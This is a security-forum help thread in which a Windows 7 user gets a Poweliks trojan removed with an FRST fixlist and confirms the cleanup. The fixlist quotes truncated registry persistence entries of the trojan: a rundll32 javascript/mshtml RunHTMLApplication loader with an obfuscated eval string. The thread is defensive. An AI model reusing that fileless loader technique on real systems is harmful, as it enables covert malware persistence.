My system is a Dell Inspiron 580 running Windows 7 Pro SP1, 64 bit. I have followed the Avast forum instructions for generating the log files and have attached them to this post.
Some additional observations while generating the log files -
The malwarebytes scan was long and sluggish with all of the network activity going on due to the malware. I eventually disconnected the network cable to the internet and the scan sped up. All remaining programs that generated log files were run without the computer connected to the internet. If this was in error for diagnosing the problem please indicate.
At first run of the aswMBR program the computer bluescreened and indicated that a clock interrupt was not received on a secondary processor within the allocated time interval. After rebooting, the program ran correctly. Not known if this was a significant event. The log files for the event are available.
I would like to request that one of the experts out there create a fixlist for this issue. Thank you.
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKU\S-1-5-21-981463533-1766717349-2643960564-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> {743EE9B2-E508-407C-882E-D2BF1C613DDC} URL =
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
Toolbar: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Toolbar: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
CustomCLSID: HKU\S-1-5-21-981463533-1766717349-2643960564-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
That certainly did the trick. Thank you very much. The fixlog file is attached. I have since come to know that this is actually the Poweliks Trojan. I have been using Windows 7 on this computer for a number of years without incident and this has shaken my confidence. Aside from Avast, I’ve never had to rely on other software such as Malwarebytes. I don’t go to outlandish websites and so must have picked this up through my normal browsing. Is this a vulnerability that Microsoft needs to address? I’m concerned I will pick this up again easily if steps aren’t taken to plug the hole.
By the way, I see posts from others with this that they have had trouble downloading the software needed to provide you with the log files. I noticed this Trojan changes the IE security settings and prevents downloading files from websites. Certainly getting the files using another computer works, but if that is unavailable, I found that if you go into Internet Options, Security tab, and select the Default level button that it will set things correctly long enough to get the files downloaded.
Interesting. Pretty much all of the trash email I get is funneled into a spam folder and never opened. I have received and opened bogus emails from friends who have had their accounts hacked, but I never open attachments or go to links that may be present. I was on the findagrave.com website when I noticed the increase in network activity begin to affect the computer performance from this Trojan. They have a lot of ads popping up at different times. I hope it’s not as easy as just going to a website that allows this to get in.
So far the computer is rock solid. I will give it a couple of days and report back if I see anything.
Thanks again. You guys perform a valuable service for the community at large. For that I am grateful.
Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked, this is a fire and forget programme
It is critical to have both a firewall and anti virus to protect your system and to keep them updated.
To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe
Whoa! I feel 10 pounds lighter. Everything is still good, but Delfix did some things I wasn’t expecting. In my user folder quite a lot got deleted. Aren’t folders like the AppData folder used by applications?
I see what it did now. It must have set the folder options in Windows Explorer to defaults. I usually like to see hidden files and folders and it had set them to not shown. Everything is there.
Cleanup completed. CryptoPrevent and Unchecky were installed as recommended.
This computer is running optimally. Thank you for your assistance with this issue. It is truly appreciated.
